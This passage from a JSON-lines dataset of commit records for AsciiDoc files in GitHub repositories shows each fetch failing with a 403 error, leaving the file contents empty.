2015-08-27-B-Sdes-LV-Talk-SIE-Mle-technology.adoc","repos":"polarbill\/polarbill.github.io,polarbill\/polarbill.github.io,polarbill\/polarbill.github.io,polarbill\/polarbill.github.io","old_file":"_posts\/2015-08-27-B-Sdes-LV-Talk-SIE-Mle-technology.adoc","new_file":"_posts\/2015-08-27-B-Sdes-LV-Talk-SIE-Mle-technology.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/polarbill\/polarbill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be1093a0fe7b6e57fd844dd0130622496f488e44","subject":"Adds state visibility CIP","message":"Adds state visibility CIP\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2015-10-03-State-visibility-between-clauses.adoc","new_file":"cip\/CIP2015-10-03-State-visibility-between-clauses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"112919f3b7d93bd6840419ac27bee2b5cc9834d0","subject":"Update Sec510_Dev_Policy_howtowork.adoc","message":"Update Sec510_Dev_Policy_howtowork.adoc\n\n\u8aa4\u5b57\u4fee\u6b63","repos":"TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms,TraningManagementSystem\/tms","old_file":"docs\/Sec510_Dev_Policy\/Sec510_Dev_Policy_howtowork.adoc","new_file":"docs\/Sec510_Dev_Policy\/Sec510_Dev_Policy_howtowork.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TraningManagementSystem\/tms.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b01473cfe4f9ebc0ec43408aa6737baca8101c4b","subject":"Add specification of the Property Graph Model","message":"Add specification of the Property Graph Model\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"docs\/property-graph-model.adoc","new_file":"docs\/property-graph-model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"caf0b959f38bc526f141504ddf7d372f70bce3fe","subject":"Update 2015-10-16-Grails-Sobrescrevendo-o-User-Details-Service-do-Spring-Security-em-um-plugin.adoc","message":"Update 2015-10-16-Grails-Sobrescrevendo-o-User-Details-Service-do-Spring-Security-em-um-plugin.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-10-16-Grails-Sobrescrevendo-o-User-Details-Service-do-Spring-Security-em-um-plugin.adoc","new_file":"_posts\/2015-10-16-Grails-Sobrescrevendo-o-User-Details-Service-do-Spring-Security-em-um-plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70c34fd5b7d2655f7777f794d6cb6e78521f5ea3","subject":"[DOCS] Build Elasticsearch Reference from elasticsearch repo (#28469)","message":"[DOCS] Build Elasticsearch Reference from elasticsearch repo (#28469)\n\n","repos":"strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra","old_file":"docs\/reference\/index.x.asciidoc","new_file":"docs\/reference\/index.x.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/strapdata\/elassandra.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"362ed2ad6080547d4fdcd2395c0745f140ed28d8","subject":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","message":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcf55049b3e8104ad7a03fcbee6a99f2e7b5270c","subject":"s\/:where\/:when\/","message":"s\/:where\/:when\/\n","repos":"tcsavage\/cats,alesguzik\/cats,mccraigmccraig\/cats,yurrriq\/cats,funcool\/cats,OlegTheCat\/cats","old_file":"doc\/cats.asciidoc","new_file":"doc\/cats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"321f55deb80d8fec870e6f36864b7fc7282f7d64","subject":"Update 2015-11-14-a-light-simulator.adoc","message":"Update 2015-11-14-a-light-simulator.adoc","repos":"hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io","old_file":"_posts\/2015-11-14-a-light-simulator.adoc","new_file":"_posts\/2015-11-14-a-light-simulator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hbbalfred\/hbbalfred.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"350d5e4a083175a03f43590245d6f64f085ab0ed","subject":"Add news for 2.0.0. release","message":"Add news for 2.0.0. release\n","repos":"levymoreira\/griffon,tschulte\/griffon,tschulte\/griffon,levymoreira\/griffon,griffon\/griffon,levymoreira\/griffon,griffon\/griffon,tschulte\/griffon","old_file":"docs\/griffon-site\/src\/jbake\/content\/news\/griffon_2.0.0.adoc","new_file":"docs\/griffon-site\/src\/jbake\/content\/news\/griffon_2.0.0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tschulte\/griffon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f13750ad352878bce2134ce011ec441bd0923df","subject":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","message":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","repos":"silesnet\/silesnet.github.io,silesnet\/silesnet.github.io,silesnet\/silesnet.github.io","old_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silesnet\/silesnet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebcd16e61f297620f0a376209d5e6c4da649318e","subject":"Update 2016-03-20-douleurs-extremes-atterrissage-avion.adoc","message":"Update 2016-03-20-douleurs-extremes-atterrissage-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-douleurs-extremes-atterrissage-avion.adoc","new_file":"_posts\/2016-03-20-douleurs-extremes-atterrissage-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fff41c6cce2d14fc14cdca7fe511795fdbab657d","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4e32f30d517a80287757ca032f2082a64d1fe23","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/overcoming_my_prejudices.adoc","new_file":"content\/writings\/overcoming_my_prejudices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2f651617a2ce888be2db34447056838888e827df","subject":"Update 2014-01-17-Episode-4-Much-Ado-About-Nothing.adoc","message":"Update 2014-01-17-Episode-4-Much-Ado-About-Nothing.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2014-01-17-Episode-4-Much-Ado-About-Nothing.adoc","new_file":"_posts\/2014-01-17-Episode-4-Much-Ado-About-Nothing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3a95a66660330e4359c49f5fb6f35d7e12ee264","subject":"Fixing cut-in-middle paragraph (#21850)","message":"Fixing cut-in-middle paragraph (#21850)\n\n","repos":"mjason3\/elasticsearch,LeoYao\/elasticsearch,artnowo\/elasticsearch,a2lin\/elasticsearch,IanvsPoplicola\/elasticsearch,fred84\/elasticsearch,wenpos\/elasticsearch,HonzaKral\/elasticsearch,mikemccand\/elasticsearch,masaruh\/elasticsearch,naveenhooda2000\/elasticsearch,i-am-Nathan\/elasticsearch,nazarewk\/elasticsearch,IanvsPoplicola\/elasticsearch,scottsom\/elasticsearch,scorpionvicky\/elasticsearch,i-am-Nathan\/elasticsearch,wenpos\/elasticsearch,masaruh\/elasticsearch,Stacey-Gammon\/elasticsearch,ZTE-PaaS\/elasticsearch,alexshadow007\/elasticsearch,fred84\/elasticsearch,gingerwizard\/elasticsearch,fforbeck\/elasticsearch,shreejay\/elasticsearch,s1monw\/elasticsearch,JSCooke\/elasticsearch,geidies\/elasticsearch,strapdata\/elassandra,MaineC\/elasticsearch,markwalkom\/elasticsearch,obourgain\/elasticsearch,winstonewert\/elasticsearch,StefanGor\/elasticsearch,s1monw\/elasticsearch,shreejay\/elasticsearch,nezirus\/elasticsearch,njlawton\/elasticsearch,fernandozhu\/elasticsearch,MisterAndersen\/elasticsearch,henakamaMSFT\/elasticsearch,fernandozhu\/elasticsearch,umeshdangat\/elasticsearch,nilabhsagar\/elasticsearch,robin13\/elasticsearch,wuranbo\/elasticsearch,elasticdog\/elasticsearch,JackyMai\/elasticsearch,mohit\/elasticsearch,mortonsykes\/elasticsearch,strapdata\/elassandra,ThiagoGarciaAlves\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,StefanGor\/elasticsearch,elasticdog\/elasticsearch,glefloch\/elasticsearch,i-am-Nathan\/elasticsearch,wenpos\/elasticsearch,HonzaKral\/elasticsearch,rlugojr\/elasticsearch,nazarewk\/elasticsearch,henakamaMSFT\/elasticsearch,fred84\/elasticsearch,mortonsykes\/elasticsearch,brandonkearby\/elasticsearch,mikemccand\/elasticsearch,LewayneNaidoo\/elasticsearch,nilabhsagar\/elasticsearch,geidies\/elasticsearch,coding0011\/elasticsearch,glefloch\/elasticsearch,mjason3\/elasticsearch,njlawton\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,fforbeck\/elasticsearch,StefanGor\/elasticsearch,nknize\/elasticsearch,pozhidaevak\/elasticsearch,mohit\/elasticsearch,ZTE-PaaS\/elasticsearch,nezirus\/elasticsearch,LeoYao\/elasticsearch,mortonsykes\/elasticsearch,qwerty4030\/elasticsearch,MaineC\/elasticsearch,lks21c\/elasticsearch,njlawton\/elasticsearch,Helen-Zhao\/elasticsearch,JSCooke\/elasticsearch,sneivandt\/elasticsearch,coding0011\/elasticsearch,wuranbo\/elasticsearch,elasticdog\/elasticsearch,wangtuo\/elasticsearch,nknize\/elasticsearch,LeoYao\/elasticsearch,mortonsykes\/elasticsearch,fernandozhu\/elasticsearch,obourgain\/elasticsearch,qwerty4030\/elasticsearch,njlawton\/elasticsearch,jprante\/elasticsearch,scottsom\/elasticsearch,brandonkearby\/elasticsearch,Stacey-Gammon\/elasticsearch,jprante\/elasticsearch,ZTE-PaaS\/elasticsearch,Shepard1212\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,rlugojr\/elasticsearch,naveenhooda2000\/elasticsearch,LewayneNaidoo\/elasticsearch,ZTE-PaaS\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,maddin2016\/elasticsearch,strapdata\/elassandra,rajanm\/elasticsearch,maddin2016\/elasticsearch,JackyMai\/elasticsearch,nknize\/elasticsearch,wuranbo\/elasticsearch,rlugojr\/elasticsearch,fforbeck\/elasticsearch,rajanm\/elasticsearch,bawse\/elasticsearch,JackyMai\/elasticsearch,LeoYao\/elasticsearch,henakamaMSFT\/elasticsearch,ZTE-PaaS\/elasticsearch,wuranbo\/elasticsearch,IanvsPoplicola\/elasticsearch,C-Bish\/elasticsearch,rlugojr\/elasticsearch,fforbeck\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,MaineC\/elasticsearch,glefloch\/elasticsearch,gfyoung\/elasticsearch,mohit\/elasticsearch,artnowo\/elasticsearch,wuranbo\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,C-Bish\/elasticsearch,C-Bish\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,naveenhooda2000\/elasticsearch,nknize\/elasticsearch,JackyMai\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,a2lin\/elasticsearch,umeshdangat\/elasticsearch,elasticdog\/elasticsearch,pozhidaevak\/elasticsearch,LewayneNaidoo\/elasticsearch,lks21c\/elasticsearch,s1monw\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,geidies\/elasticsearch,nezirus\/elasticsearch,MaineC\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,glefloch\/elasticsearch,winstonewert\/elasticsearch,geidies\/elasticsearch,IanvsPoplicola\/elasticsearch,bawse\/elasticsearch,fernandozhu\/elasticsearch,vroyer\/elasticassandra,uschindler\/elasticsearch,mohit\/elasticsearch,alexshadow007\/elasticsearch,geidies\/elasticsearch,vroyer\/elasticassandra,jimczi\/elasticsearch,i-am-Nathan\/elasticsearch,fred84\/elasticsearch,winstonewert\/elasticsearch,masaruh\/elasticsearch,gfyoung\/elasticsearch,artnowo\/elasticsearch,fernandozhu\/elasticsearch,markwalkom\/elasticsearch,GlenRSmith\/elasticsearch,C-Bish\/elasticsearch,JSCooke\/elasticsearch,kalimatas\/elasticsearch,MisterAndersen\/elasticsearch,henakamaMSFT\/elasticsearch,njlawton\/elasticsearch,Shepard1212\/elasticsearch,nilabhsagar\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,jimczi\/elasticsearch,nazarewk\/elasticsearch,lks21c\/elasticsearch,mjason3\/elasticsearch,mjason3\/elasticsearch,mortonsykes\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,henakamaMSFT\/elasticsearch,wenpos\/elasticsearch,nilabhsagar\/elasticsearch,mikemccand\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,brandonkearby\/elasticsearch,LewayneNaidoo\/elasticsearch,a2lin\/elasticsearch,IanvsPoplicola\/elasticsearch,lks21c\/elasticsearch,robin13\/elasticsearch,Shepard1212\/elasticsearch,uschindler\/elasticsearch,wangtuo\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,obourgain\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,fforbeck\/elasticsearch,LeoYao\/elasticsearch,kalimatas\/elasticsearch,glefloch\/elasticsearch,jprante\/elasticsearch,Stacey-Gammon\/elasticsearch,mikemccand\/elasticsearch,Helen-Zhao\/elasticsearch,obourgain\/elasticsearch,LeoYao\/elasticsearch,jimczi\/elasticsearch,maddin2016\/elasticsearch,bawse\/elasticsearch,Helen-Zhao\/elasticsearch,Stacey-Gammon\/elasticsearch,nilabhsagar\/elasticsearch,i-am-Nathan\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elassandra,jprante\/elasticsearch,obourgain\/elasticsearch,bawse\/elasticsearch,rlugojr\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,jprante\/elasticsearch,brandonkearby\/elasticsearch,nazarewk\/elasticsearch,sneivandt\/elasticsearch,JackyMai\/elasticsearch,LewayneNaidoo\/elasticsearch,scottsom\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,a2lin\/elasticsearch,StefanGor\/elasticsearch,bawse\/elasticsearch,pozhidaevak\/elasticsearch,coding0011\/elasticsearch,Helen-Zhao\/elasticsearch,a2lin\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,artnowo\/elasticsearch,MisterAndersen\/elasticsearch,winstonewert\/elasticsearch,JSCooke\/elasticsearch,gfyoung\/elasticsearch,umeshdangat\/elasticsearch,JSCooke\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,umeshdangat\/elasticsearch,nezirus\/elasticsearch,Helen-Zhao\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,alexshadow007\/elasticsearch,gingerwizard\/elasticsearch,brandonkearby\/elasticsearch,s1monw\/elasticsearch,markwalkom\/elasticsearch,lks21c\/elasticsearch,winstonewert\/elasticsearch,Shepard1212\/elasticsearch,kalimatas\/elasticsearch,MisterAndersen\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,mikemccand\/elasticsearch,sneivandt\/elasticsearch,vroyer\/elasticassandra,MisterAndersen\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,strapdata\/elassandra,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,geidies\/elasticsearch,elasticdog\/elasticsearch,naveenhooda2000\/elasticsearch,artnowo\/elasticsearch,Shepard1212\/elasticsearch,vroyer\/elassandra,ThiagoGarciaAlves\/elasticsearch,MaineC\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nazarewk\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,Stacey-Gammon\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,C-Bish\/elasticsearch,jimczi\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,StefanGor\/elasticsearch","old_file":"docs\/reference\/docs\/multi-termvectors.asciidoc","new_file":"docs\/reference\/docs\/multi-termvectors.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8a7ef10430eaff795df864dfa76a7e018e93315","subject":"Update 2016-02-26-Gantt.adoc","message":"Update 2016-02-26-Gantt.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-Gantt.adoc","new_file":"_posts\/2016-02-26-Gantt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26d6c1dd546fa957c821a7069ea33e528a636708","subject":"y2b create post Samsung Galaxy S8 - Does It Suck?","message":"y2b create post Samsung Galaxy S8 - Does It Suck?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-03-Samsung-Galaxy-S8--Does-It-Suck.adoc","new_file":"_posts\/2017-04-03-Samsung-Galaxy-S8--Does-It-Suck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adca53a984d6ed0af389396a6062d4de2ff13ed2","subject":"Start of API landing page.","message":"Start of API landing page.\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"docs\/libnng.adoc","new_file":"docs\/libnng.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"297fdfbc5107549f1b3df26ba8e0d5b02403fcc7","subject":"Update 2015-07-13-Essential-Drupal-development-tools.adoc","message":"Update 2015-07-13-Essential-Drupal-development-tools.adoc","repos":"trangunghoa\/hubpress.io,trangunghoa\/hubpress.io,trangunghoa\/hubpress.io","old_file":"_posts\/2015-07-13-Essential-Drupal-development-tools.adoc","new_file":"_posts\/2015-07-13-Essential-Drupal-development-tools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trangunghoa\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0aa64001774beb4a4c006c1ae0d9b843d4e0053","subject":"Update 2016-01-12-This-is.adoc","message":"Update 2016-01-12-This-is.adoc","repos":"kim0\/hubpress.io,kim0\/hubpress.io,kim0\/hubpress.io","old_file":"_posts\/2016-01-12-This-is.adoc","new_file":"_posts\/2016-01-12-This-is.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kim0\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2d1dd355cd9061958276bc30ec5be16e2c03271","subject":"Update 2016-03-10-T-E-S-T.adoc","message":"Update 2016-03-10-T-E-S-T.adoc","repos":"innovation-yagasaki\/innovation-yagasaki.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,innovation-yagasaki\/innovation-yagasaki.github.io","old_file":"_posts\/2016-03-10-T-E-S-T.adoc","new_file":"_posts\/2016-03-10-T-E-S-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-yagasaki\/innovation-yagasaki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e3881b7d282aedb948fa28418fb2988ba5c2f22","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"526c062efb4ebbabb0e81cfb999337d9b0d38cb7","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79195fa0f0641cae87812b716b81d6cbb77a5953","subject":"Update 2018-03-15-try-ecr.adoc","message":"Update 2018-03-15-try-ecr.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-15-try-ecr.adoc","new_file":"_posts\/2018-03-15-try-ecr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b89a5f5bdc1a973954b936f5d102ffddd9c542f","subject":"Update 2017-06-12-neural_networks_training_basics.adoc","message":"Update 2017-06-12-neural_networks_training_basics.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2017-06-12-neural_networks_training_basics.adoc","new_file":"_posts\/2017-06-12-neural_networks_training_basics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ff22d2a5b31923d8f2f6e23b9b91885e26cfeb2","subject":"Update 2015-11-27-New-Maven-project-for-FoundationFaces.adoc","message":"Update 2015-11-27-New-Maven-project-for-FoundationFaces.adoc","repos":"hfluz\/hfluz.github.io,hfluz\/hfluz.github.io,hfluz\/hfluz.github.io","old_file":"_posts\/2015-11-27-New-Maven-project-for-FoundationFaces.adoc","new_file":"_posts\/2015-11-27-New-Maven-project-for-FoundationFaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hfluz\/hfluz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c447b9d068cd0869b581dd53072d96978d073fb8","subject":"Update 2016-03-18-A-Breakdown-of-the-Top-Four-Teams.adoc","message":"Update 2016-03-18-A-Breakdown-of-the-Top-Four-Teams.adoc","repos":"mrtrombley\/blog,mrtrombley\/blog,mrtrombley\/blog,mrtrombley\/blog","old_file":"_posts\/2016-03-18-A-Breakdown-of-the-Top-Four-Teams.adoc","new_file":"_posts\/2016-03-18-A-Breakdown-of-the-Top-Four-Teams.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mrtrombley\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4de43f7f2808ff42aec33dbfa6433b7be1c458bb","subject":"Update 2016-07-18-Using-ember-cli-visual-acceptance.adoc","message":"Update 2016-07-18-Using-ember-cli-visual-acceptance.adoc","repos":"ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog","old_file":"_posts\/2016-07-18-Using-ember-cli-visual-acceptance.adoc","new_file":"_posts\/2016-07-18-Using-ember-cli-visual-acceptance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciena-blueplanet\/developers.blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"369b2cf303420e12e81e9211e58032bdf386c573","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e4de32052042d70a67920ffb077b216e3d7afaa7","subject":"Update 2016-01-25-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","message":"Update 2016-01-25-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-01-25-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","new_file":"_posts\/2016-01-25-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86afd446c36b7baf210924dc6927ea8c14866350","subject":"update project","message":"update 